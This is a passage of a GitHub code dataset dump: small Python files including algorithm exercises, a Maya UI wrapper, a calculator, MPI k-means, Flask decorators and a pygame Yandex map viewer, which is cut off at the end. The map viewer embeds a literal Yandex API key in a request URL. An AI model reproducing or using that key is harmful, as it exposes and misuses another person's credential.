crash[ny][nx] > crash[cur_y][cur_x] + 1:\n crash[ny][nx] = crash[cur_y][cur_x] + 1\n queue.append([nx, ny])\n\n\nbfs(0, 0)\nprint(crash[N - 1][M - 1])\n","repo_name":"ssun-g/solution","sub_path":"BOJ/python/1261.py","file_name":"1261.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19513282911","text":"\n\nimport maya.cmds as cmds\nfrom .. import UI_Object\n\n########################################################################\nclass SaveShelf(UI_Object.UI):\n\t\"\"\"\n\tThis command saves the specified shelf (first argument) to the\n\tspecified file (second argument).\n\t\n\tNote that this command doesn't work well with controls that have\n\tmixed mel and python command callbacks. Also, because it saves the\n\tstate to a mel file, it does not work with callbacks that are python\n\tcallable objects.\n\t\"\"\"\n\t#----------------------------------------------------------------------\n\tdef __init__(self, name=None, **kwargs):\n\t\tparent = None\n\t\tif kwargs.has_key(\"qtParent\"):\n\t\t\tparent = kwargs.pop(\"qtParent\")\n\t\t\t\n\t\tif name == None:\n\t\t\tname = cmds.saveShelf(**kwargs)\n\t\t\tsuper(SaveShelf, self).__init__(name, **dict(qtParent=parent))\n\t\t\t\n\t\telse:\n\t\t\tif cmds.saveShelf(name, exists=True):\n\t\t\t\tsuper(SaveShelf, self).__init__(name)\n\t\t\telse:\n\t\t\t\tname = cmds.saveShelf(name, **kwargs)\n\t\t\t\tsuper(SaveShelf, self).__init__(name, **dict(qtParent=parent))","repo_name":"SGSMarkNA/DML_Tools","sub_path":"DML_Maya/Maya_GUI/MiscUI/SaveShelf.py","file_name":"SaveShelf.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31958756151","text":"__author__ = 'ylwoi'\n\nfrom tkinter import *\n\nroot = Tk()\n\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n# create a function that takes 1 parameter:\n# a list of [x, y] points\n# and connects them with green lines.\n# connect these to get a box: [[10, 10], [290, 10], [290, 290], [10, 290]]\n# connect these: [[50, 100], [70, 70], [80, 90], [90, 90], [100, 70],\n# [120, 100], [85, 130], [50, 100]]\n\nbox_list = [[10, 10], [290, 10], [290, 290], [10, 290],[10, 10]]\nlines_list = [[50, 100], [70, 70], [80, 90], [90, 90], [100, 70], [120, 100], [85, 130], [50, 100]]\n\ndef dot_connector(list):\n coord_list = []\n for i in range(len(list)):\n if i < (len(list)-1):\n draw = canvas.create_line(list[i][0],list[i][1],list[i+1][0],list[i+1][1])\n if i == len(list)-1:\n draw = canvas.create_line(list[i][0],list[i][1],list[0][0],list[0][1])\n\ndot_connector(box_list)\ndot_connector(lines_list)\n\nroot.mainloop()\n","repo_name":"jsdelivrbot/Ylwoi","sub_path":"week03/day_3/connect_the_dots.py","file_name":"connect_the_dots.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22885609485","text":"import logg\nimport calc\n\n\ndef input_integer(message, message_error):\n a = None\n while True:\n if a is None:\n try:\n a = int(input(message))\n break\n except ValueError:\n print(message_error)\n continue\n\n return a\n\n\ndef input_action(message, message_error):\n action = None\n while True:\n if action is None:\n val = input(message)\n if val in ['+', '-', '/', '*']:\n action = val\n break\n else:\n print(message_error)\n return action\n\ndef complex_menu_calc():\n ai = input_integer('введите действительную часть первого числа','Введите корректное число')\n aj = input_integer('введите мнимую часть первого числа','Введите корректное число')\n bi = input_integer('введите действительную часть второго числа','Введите корректное число')\n bj = input_integer('введите мнимую часть второго числа','Введите корректное число')\n\n x = complex(ai, aj)\n y = complex(bi, bj)\n\n action = input_action(\"Введите действие: ['+', '-', '/', '*']\", 'Введитте коррдействие')\n if action == '/' and bi == 0 and bj == 0 :\n print('НА 0 ДЕЛИТЬ НЕЛЬЗЯ')\n logg.log_warn(\"user tried to divide by zero\")\n else:\n print(f\"Результат: {act_rat_num(x,y,action)}\")\n\n\n\ndef rational_menu_calc():\n a = input_integer('Введите первое число', \"Введите корректное первое число\")\n b = input_integer('Введите второе число', \"Введите корректное второе число\")\n action = input_action(\"Введите действие: ['+', '-', '/', '*']\", 'Введитте коррдействие')\n\n if action == '/' and b == 0:\n print('НА 0 ДЕЛИТЬ НЕЛЬЗЯ')\n logg.log_warn(\"user tried to divide by zero\")\n else:\n print(f\"Результат: {act_rat_num(a, b, action)}\")\n\n\ndef act_rat_num(a, b, action):\n result = None\n\n if action == \"+\":\n result = calc.sum_fun(a, b)\n elif action == \"-\":\n result = calc.subtract_fun(a, b)\n elif action == \"*\":\n result = calc.multiply_fun(a, b)\n elif action == \"/\":\n result = calc.divide_fun(a, b)\n else:\n print(\"ERR\")\n\n logg.lod_action(f\"Calculated {a} {action} {b} = {result}\")\n return result\n","repo_name":"Natalia4e/Project_calculator","sub_path":"excep.py","file_name":"excep.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14229334744","text":"\ndef numPairsDivisibleBy60(time):\n res = 0\n ref = {}\n for t in time:\n rem = t % 60\n if rem == 0:\n if 0 in ref:\n res = res + ref[0]\n elif (60 - rem) in ref:\n res = res + ref[60 - rem]\n\n ref[rem] = ref.get(rem, 0) + 1\n\n return res\n\nnumPairsDivisibleBy60([60,60,60])","repo_name":"Hrishi246/InterviewPractise","sub_path":"Misc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10417507844","text":"def findFourElements(arr, n, X):\r\n\tmp = {}\r\n\tfor i in range(n - 1):\r\n\t\tfor j in range(i + 1, n):\r\n\t\t\tmp[arr[i] + arr[j]] = [i, j]\r\n\tfor i in range(n - 1):\r\n\t\tfor j in range(i + 1, n):\r\n\t\t\tsumm = arr[i] + arr[j]\r\n\t\t\tif (X - summ) in mp:\r\n\t\t\t\tp = mp[X - summ]\r\n\t\t\t\tif (p[0] != i and p[0] != j and p[1] != i and p[1] != j):\r\n\t\t\t\t\tprint(arr[i], \", \", arr[j], \", \",\r\n\t\t\t\t\t\tarr[p[0]], \", \", arr[p[1]], sep=\"\")\r\n\t\t\t\t\treturn\r\narr = []\r\nn =int(input(\"Enter size\"))\r\nfor i in range(0,n):\r\n\ta=int(input())\r\n\tarr.append(a)\r\nX = int(input(\"enter a value for target:\"))\r\nfindFourElements(arr, n, X)\r\n\r\n","repo_name":"Anusha1A/python","sub_path":"target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6357221965","text":"#!/usr/bin/python\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\nimport itertools\nimport sys\n\nclass MRFrequentBigrams(MRJob):\n\n # define MRJob steps\n def steps(self):\n return [\n MRStep(\n mapper_init=self.mapper_init,\n mapper=self.mapper,\n combiner=self.combiner,\n reducer=self.reducer)\n ]\n\n # load top 10000 frequently appearing words into each memory of each mapper\n def mapper_init(self):\n self.top_unigrams = { k.strip(' \"'):v for v, k in (line.split(\"\\t\") for line in open('frequent_unigrams_10K.txt').read().strip().split('\\n')) }\n \n # emit cooccuring words with count = 1\n def mapper(self, _, line):\n # select only words from the 5-gram that exists in the top 10000\n words = [ word for word in line.lower().split('\\t')[0].split() if word in self.top_unigrams.keys() ]\n \n # find bigram co-occurrences\n cooccurences = {}\n for word1, word2 in itertools.combinations(words, 2):\n if word1 in cooccurences.keys():\n cooccurences[word1][word2] = cooccurences[word1].get(word2, 0) + 1\n else:\n cooccurences[word1] = {word2: 1}\n\n for k, v in cooccurences.iteritems():\n yield (k, v)\n\n # combine word cooccurrences from the same mapper and emit stripes\n def combiner(self, word, cooccurences):\n stripes = {}\n\n for stripe in cooccurences:\n for k, v in stripe.iteritems():\n stripes[k] = stripes.get(k, 0) + v\n\n yield (word, stripes)\n\n # emit word cooccurrences as stripes\n def reducer(self, word, cooccurences):\n stripes = {}\n\n for stripe in cooccurences:\n for k, v in stripe.iteritems():\n stripes[k] = stripes.get(k, 0) + v\n\n yield (word, stripes)\n\nif __name__ == '__main__':\n MRFrequentBigrams.run()","repo_name":"RajeshThallam/MIDS-W261-MACHINE-LEARNING-AT-SCALE","sub_path":"week5/hw5/FrequentBigrams.py","file_name":"FrequentBigrams.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45504547047","text":"from flask import request\nfrom backend.criteria.schemas import criteria_form_schema\nfrom backend.models import Criteria\nfrom functools import wraps\n\n\n# Decorator to check if a criteria exists in github\ndef criteria_exists_in_github(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n data = request.get_json()\n criteria = Criteria.query.filter_by(checkpoint_id=data[\"checkpoint_id\"],\n criteria_key=data[\"criteria_key\"]).first()\n\n if criteria:\n return f(*args, **kwargs)\n else:\n return {\n \"message\": \"Criteria does not exist\"\n }, 404\n\n return wrap\n\n\n# Decorator to validate criteria form data\ndef valid_criteria_form(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n data = request.get_json()\n errors = criteria_form_schema.validate(data)\n\n if errors:\n return {\n \"message\": \"Missing or sending incorrect data to create a criteria. Double check the JSON data that it has everything needed to create a criteria.\"\n }, 500\n else:\n return f(*args, **kwargs)\n\n return wrap\n","repo_name":"bitprj/bit-backend","sub_path":"backend/criteria/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"9866386083","text":"from model_example import *\nfrom glob import glob\nimport os\nfrom tqdm import tqdm\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\ndevice = torch.device(\"cuda\")\nprint(f'Using {device} for inference')\n\nmodel = ClipBase32(num_classes=x)\npath_to_model = 'xxx'\n\nstate_dict = torch.load(path_to_model, map_location=torch.device('cpu'))['state_dict']\n\n# rename key\nfor key in list(state_dict.keys()):\n if key.startswith('backbone.'):\n new_key = key.replace('backbone.', '')\n else:\n new_key = key.replace('f.model.', 'classifier.')\n state_dict[new_key] = state_dict.pop(key)\n\nmsg = model.load_state_dict(state_dict, strict=False)\nmodel.eval().to(device)\n\nitems = []\npredict_ = []\nbasewidth = 224\n\npreprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n])\nwith torch.no_grad():\n img = Image.open(item_id).convert('RGB')\n img = preprocess(img).to(device)\n img = img.unsqueeze(0)\n\n out_model = model(img)\n output = torch.nn.functional.softmax(out_model, dim=1)\n index = output.data.cpu().numpy().argmax()\n","repo_name":"TrungThanhTran/image_classification_foundation_models","sub_path":"inference_examply.py","file_name":"inference_examply.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7530379262","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\n\r\n\r\ndef btn_click(num):\r\n global x,y\r\n global plyr_1,plyr_2\r\n from itertools import permutations\r\n set1=permutations([1,2,3])\r\n set2=permutations([4,5,6])\r\n set3=permutations([7,8,9])\r\n set4=permutations([1,4,7])\r\n set5=permutations([2,5,8])\r\n set6=permutations([3,6,9])\r\n set7=permutations([1,5,9])\r\n set8=permutations([3,5,7])\r\n \r\n for i in set1,set2,set3,set4,set5,set6,set7,set8:\r\n\t for j in list(i):\r\n\t\t player_1=all(elem in plyr_1 for elem in j)\r\n\t\t player_2=all(elem in plyr_2 for elem in j)\r\n\t\t if player_1==True:\r\n\t\t\t messagebox.showinfo(\"RESULT----\",\"Player 1 Won!!!\")\r\n\t\t\t break\r\n\t\t elif player_2==True:\r\n\t\t\t messagebox.showinfo(\"RESULT----\",\"Player 2 Won!!!\")\r\n\t\t else:pass\r\n if num == 1:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b1.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 2:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b2.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 3:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b3.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 4:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b4.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 5:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b5.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 6:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b6.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 7:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b7.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 8:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b8.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 9:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b9.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\ny=\"\"\r\nx=2\r\nplyr_1=[]\r\nplyr_2=[]\r\n\r\nroot=Tk()\r\nroot.title(\"Welcome to The TIC-TAC-TOE dev by Snehal-Singh\")\r\nroot.wm_iconbitmap(\"tic-tac-toe_39453.ico\")\r\n\r\nl1=Label(root,text=\"Player 1 : X\",font=\"times 15\")\r\nl1.grid(row=0,column=0)\r\n\r\nl2=Label(root,text=\"Player 2 : O\",font=\"times 15\")\r\nl2.grid(row=0,column=1)\r\n \r\nb1=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(1))\r\nb2=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(2))\r\nb3=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(3))\r\nb4=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(4))\r\nb5=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(5))\r\nb6=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(6))\r\nb7=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(7))\r\nb8=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(8))\r\nb9=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(9))\r\n\r\nb1.grid(row=1,column=0)\r\nb2.grid(row=1,column=1)\r\nb3.grid(row=1,column=2)\r\nb4.grid(row=2,column=0)\r\nb5.grid(row=2,column=1)\r\nb6.grid(row=2,column=2)\r\nb7.grid(row=3,column=0)\r\nb8.grid(row=3,column=1)\r\nb9.grid(row=3,column=2)\r\n\r\nroot.mainloop()\r\n","repo_name":"Snehal-Singh174/Tic-Tac-Toe","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6293681412","text":"from __future__ import print_function, absolute_import, division\n\nimport numpy as np\n\nfrom bc_exploration.sensors.sensor_util import bresenham2d\n\n\ndef test_bresenham2d():\n sx = 0\n sy = 1\n r1 = bresenham2d([sx, sy], [10, 5])\n r1_ex = np.array([[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [1, 1, 2, 2, 3, 3, 3, 4, 4, 5, 5]]).T\n r2 = bresenham2d([sx, sy], [9, 6])\n r2_ex = np.array([[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 2, 3, 3, 4, 4, 5, 5, 6]]).T\n assert np.logical_and(np.sum(r1 == r1_ex) == np.size(r1_ex), np.sum(r2 == r2_ex) == np.size(r2_ex))\n\n\ndef main():\n test_bresenham2d()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"braincorp/bc_exploration","sub_path":"bc_exploration/sensors/test_sensor_util.py","file_name":"test_sensor_util.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74386773922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 30 15:57:16 2018\n\n@author: haider\n\"\"\"\n\nfrom mpi4py import MPI\nimport pandas as pd\nimport numpy as np\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\nt_start = MPI.Wtime()\nMaster = 0\n\n\ncolum = 21\n#row for centroid\ncrow = 8\n#row for data\n#drow = 16\n\nif rank == Master:\n# dataSet = np.random.randint(10,size=[drow,colum])\n# #print(matrix)\n# slice1 = drow//size\n cantroid = np.random.randint(10,size=[crow,colum])\n \n df1 = pd.read_csv(\"Absenteeism_at_work.csv\",delimiter = \";\")\n dataSet = df1.values\n slice1 = dataSet.shape[0]//size\n \n for i in range(1,size):\n Sindx = i*slice1\n Eindx = (i+1)*slice1\n #for last complete send\n if i == size-1:\n chunkkk = dataSet[Sindx:dataSet.shape[0],:]\n comm.send(chunkkk,dest = i)\n \n else:\n \n chunkkk = dataSet[Sindx:Eindx,:]\n comm.send(chunkkk,dest = i)\n comm.send(cantroid,dest = i)\n #data at master postion\n recv1 = dataSet[0:slice1,:]\n recv2 = cantroid \n \n\n#print(slice)\n#print(df.shape)\n \n \nelse:\n\n#for data recv other than master \n recv1 = comm.recv(source=Master)\n#for centroid recv\n recv2 = comm.recv(source=Master)\n\n\nwhile True: \n result = np.zeros(shape = (recv1.shape[0],recv2.shape[0]), dtype = int)\n #column = 4\n#loop for data\n for m in range (0,recv1.shape[0]):\n#loof for centroid\n for q in range (0,crow):\n #loop for every column at one row\n for p in range (0,colum):\n result[m,q] = result[m,q] + (recv2[q,p] - recv1[m,p])**2\n result[m,q] = np.sqrt(result[m,q])\n \n#distance\n print(\"distance results\")\n print(result)\n\n#for membership matrix\n membr = np.zeros (shape = (recv1.shape[0],1), dtype = int)\n for n in range (0,recv1.shape[0]):\n #for minimum index finding for a valu\n membr[n,0] = np.argmin(result[n,:])\n# print(\"membership array\")\n# print(membr)\n \n \n fResult= np.zeros (shape = (recv2.shape[0],colum), dtype = int)\n for localMean in range (0,recv1.shape[0]):\n \n fResult[membr[localMean]] = fResult[membr[localMean]] + recv1[localMean]\n \n print(\"addition of all members\")\n print(fResult)\n\n if rank == Master:\n Globalmean= np.zeros (shape = (recv2.shape[0],colum), dtype = int)\n else:\n Globalmean = None\n \n comm.Reduce([fResult , MPI.INT],[Globalmean , MPI.INT])\n akhatyMembr = comm.gather(membr)\n if rank == Master:\n akhatyMembr = np.vstack(akhatyMembr)\n \n #count gather members for taking mean\n clusterSize = np.zeros (shape = (crow,1), dtype = int)\n for countgather in range (0,dataSet.shape[0]):\n clusterSize[akhatyMembr[countgather]] = clusterSize[akhatyMembr[countgather]] + 1\n \n #for centroid find\n Globalmeanfinal= np.zeros (shape = (recv2.shape[0],colum), dtype = int)\n for centroid in range (0,crow):\n #for avoiding the devision with 0\n if clusterSize[centroid] != 0:\n Globalmeanfinal[centroid] = Globalmean[centroid] /clusterSize[centroid]\n else:\n Globalmeanfinal = None\n\n temporary = recv2.copy()\n recv2 = comm.bcast(Globalmeanfinal)\n print(\"differnce\")\n #print(temporary, recv2)\n print (\"previous\")\n print (temporary)\n print (\"final\")\n print (recv2)\n if np.array_equal(temporary, recv2):\n if rank == Master:\n end_time = MPI.Wtime()\n total_time = end_time - t_start\n print(\"total time\")\n print(total_time)\n break\n \n \n","repo_name":"trojrobert/MPI-Distributed-Big-data-Computing_1-","sub_path":"K Means/Others/k means Haider.py","file_name":"k means Haider.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17008817529","text":"from django.core.management.base import BaseCommand\n\nfrom accounts.models import User\nfrom accounts.views import create_user_profile\n\n\nclass Command(BaseCommand):\n help = \"Check and create user profile\"\n\n def create_profile(self):\n created_users = []\n users = User.objects.all()\n for user in users:\n status = create_user_profile(user)\n if status:\n self.stdout.write(\n self.style.SUCCESS('Created profile for \"%s\"' % user.username)\n )\n created_users.append(user.username)\n\n return created_users\n\n def handle(self, *args, **options):\n users = self.create_profile()\n\n self.stdout.write(\n self.style.SUCCESS(\n 'Successfully created profile for \"%s\" users' % len(users)\n )\n )\n","repo_name":"Anyesh/totoro","sub_path":"accounts/management/commands/createuserprofile.py","file_name":"createuserprofile.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15448313624","text":"import pygame\r\nimport requests\r\nimport sys\r\nimport os\r\nimport button\r\nimport gui\r\nimport textbox\r\nimport label\r\nimport math\r\npygame.init()\r\ncoords = input().split(\",\")\r\nresponse = None\r\nzom = 1\r\ntype = \"map\"\r\ndef lonlat_distance(a, b):\r\n\r\n degree_to_meters_factor = 111 * 1000\r\n a_lon, a_lat = a.split(\" \")\r\n b_lon, b_lat = b.split(\" \")\r\n a_lon,a_lat,b_lon,b_lat = float(a_lon),float(a_lat),float(b_lon),float(b_lat)\r\n radians_lattitude = math.radians((a_lat + b_lat) / 2.)\r\n lat_lon_factor = math.cos(radians_lattitude)\r\n dx = abs(a_lon - b_lon) * degree_to_meters_factor * lat_lon_factor\r\n dy = abs(a_lat - b_lat) * degree_to_meters_factor\r\n distance = math.sqrt(dx * dx + dy * dy)\r\n\r\n return distance\r\ndef get_json_request(tofind):\r\n geo_request = \"http://geocode-maps.yandex.ru/1.x/\"\r\n r = requests.get(geo_request, params={\"geocode\": tofind, \"format\": \"json\"})\r\n if r:return r.json()\r\n else: return \"B\"\r\ndef get_image(zoom,coords,type,points = \"\"):\r\n try:\r\n map_request = \"http://static-maps.yandex.ru/1.x/\"\r\n map_params = {\r\n \"ll\":\",\".join(coords),\r\n \"z\":zoom,\r\n \"l\":type,\r\n \"size\":\"600,450\"\r\n }\r\n if points: map_params[\"pt\"] = point\r\n response = requests.get(map_request,params = map_params)\r\n\r\n if not response:\r\n sys.exit(1)\r\n except Exception as a:\r\n print(a)\r\n sys.exit(1)\r\n\r\n # Запишем полученное изображение в файл.\r\n map_file = \"map.png\"\r\n try:\r\n with open(map_file, \"wb\") as file:\r\n file.write(response.content)\r\n except IOError as ex:\r\n print(\"Ошибка записи временного файла:\", ex)\r\n sys.exit(2)\r\n res = pygame.image.load(map_file)\r\n os.remove(map_file)\r\n return res\r\n\r\nimage = get_image(zom,coords,\"map\")\r\n# Инициализируем pygame\r\n\r\nscreen = pygame.display.set_mode((600, 450))\r\ngui = gui.GUI()\r\nmap_button = button.Button(pygame.Rect(10,10,100,25),\"карта\")\r\ngui.add_element(map_button)\r\nsat_button = button.Button(pygame.Rect(10,45,100,25),\"спутник\")\r\ngui.add_element(sat_button)\r\ngib_button = button.Button(pygame.Rect(10,80,100,25),\"гибрид\")\r\ngui.add_element(gib_button)\r\nfindbox = textbox.TextBox(pygame.Rect(300,10,300,50),\"\")\r\ngui.add_element(findbox)\r\nfind_button = button.Button(pygame.Rect(500,70,100,25),\"найти\")\r\ngui.add_element(find_button)\r\nclear_button = button.Button(pygame.Rect(500,105,100,25),\"стереть\")\r\ngui.add_element(clear_button)\r\nstat = label.Label(pygame.Rect(10,425,600,25),\"\",pygame.Color(\"white\"),pygame.Color(\"blue\"))\r\ngui.add_element(stat)\r\nindex_button = button.Button(pygame.Rect(500,140,100,25),\"индекс\")\r\ngui.add_element(index_button)\r\n# Рисуем картинку, загружаемую из только что созданного файла.\r\nlimit = [1,19]\r\n# Переключаем экран и ждем закрытия окна.\r\nrunning = True\r\nwalkx=450\r\nwalky=240\r\nwasfinded = \"\"\r\npoint = \"\"\r\nindex = False\r\nfind_button.font_color = pygame.Color(\"white\")\r\nmap_button.font_color = pygame.Color(\"white\")\r\nsat_button.font_color = pygame.Color(\"white\")\r\ngib_button.font_color = pygame.Color(\"white\")\r\nindex_button.font_color = pygame.Color(\"white\")\r\nclear_button.font_color = pygame.Color(\"white\")\r\nwhile running:\r\n prevcoords = coords.copy()\r\n for e in pygame.event.get():\r\n gui.get_event(e)\r\n if sat_button.pressed and type != \"sat\":\r\n type = \"sat\"\r\n image = get_image(zom,coords,type,point)\r\n if gib_button.pressed and type != \"sat,skl\":\r\n type = \"sat,skl\"\r\n image = get_image(zom,coords,type,point)\r\n if map_button.pressed and type != \"map\":\r\n type = \"map\"\r\n image = get_image(zom,coords,type, point)\r\n if (clear_button.pressed or (findbox.executed and findbox.text == \"\")) and point:\r\n point = \"\"\r\n findbox.executed = False\r\n image = get_image(zom, coords, type, point)\r\n stat.text = \"\"\r\n if index_button.pressed:\r\n if index:\r\n index_button.text =\"индекс\"\r\n stat.text = text\r\n else:\r\n index_button.text =\"нет\"\r\n stat.text = text + \" | \" + iindex\r\n index= not index\r\n if (find_button.pressed or findbox.executed) and wasfinded != findbox.text and findbox.text:\r\n findbox.executed = False\r\n req = get_json_request(findbox.text)\r\n if req != \"B\" and req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"]:\r\n try:\r\n iindex = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"Address\"][\"postal_code\"]\r\n except Exception: iindex = \"Unable to find\"\r\n coordsOf = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"Point\"][\"pos\"].split(\" \")\r\n point = \",\".join(coordsOf)+\",pm2gnl\"\r\n coords = coordsOf.copy()\r\n image = get_image(zom,coords,type,point)\r\n text = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"text\"]\r\n stat.text = text\r\n if index: stat.text +=\" | \" + iindex\r\n else:\r\n stat.text = \"Unable to find\"\r\n\r\n if e.type == pygame.MOUSEBUTTONDOWN and not findbox.active and all([not clear_button.pressed, not find_button.pressed,\r\n not gib_button.pressed,\r\n not index_button.pressed,\r\n not map_button.pressed,\r\n not sat_button.pressed]):\r\n x = str(float(coords[0]) + (walkx * ((e.pos[0] - 300) / 600)) / (2 ** (zom - 1)))\r\n y = str(float(coords[1]) + (-walky * ((e.pos[1] - 225) / 450)) / (2 ** (zom - 1)))\r\n if e.button == 1:\r\n req = get_json_request(\",\".join([x, y]))\r\n if req !=\"B\" and req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"]:\r\n text = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"text\"]\r\n stat.text = text\r\n try:\r\n iindex = req[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"][\"metaDataProperty\"][\"GeocoderMetaData\"][\"Address\"][\"postal_code\"]\r\n except Exception: iindex = \"Unable to find\"\r\n point = \",\".join([x,y]) + \",pm2gnl\"\r\n try:\r\n image = get_image(zom, coords, type, point)\r\n except Exception: pass\r\n elif e.button == 3:\r\n try:\r\n if findbox.text == \"\": findbox.text = \"аптека\"\r\n req = requests.get(\"https://search-maps.yandex.ru/v1/?ll=\"+\",\".join([x, y])+\"&ll=\"+\",\".join(coords)+\"&spn=0.000045,0.000045&lang=ru_RU&results=1&apikey=3c4a592e-c4c0-4949-85d1-97291c87825c\").json()\r\n print(req)\r\n if req[\"features\"]:\r\n index = \"Unable to find\"\r\n text = req[\"features\"][0][\"properties\"][\"CompanyMetaData\"][\"name\"]\r\n point = \",\".join(map(lambda x: str(x), req[\"features\"][0][\"geometry\"][\"coordinates\"])) + \",pm2orl\"\r\n stat.text = text\r\n image = get_image(zom, coords, type, point)\r\n except Exception: pass\r\n\r\n if e.type == pygame.QUIT: running = False\r\n if e.type == pygame.KEYDOWN:\r\n if e.key == pygame.K_PAGEUP and float(zom) limit[0]:\r\n zom = zom-1\r\n image = get_image(zom,coords,type, point)\r\n if e.key == pygame.K_UP:\r\n coords[1] = str(float(coords[1])+walky/(2**(zom-1)))\r\n try:\r\n image = get_image(zom,coords,type, point)\r\n except: coords = 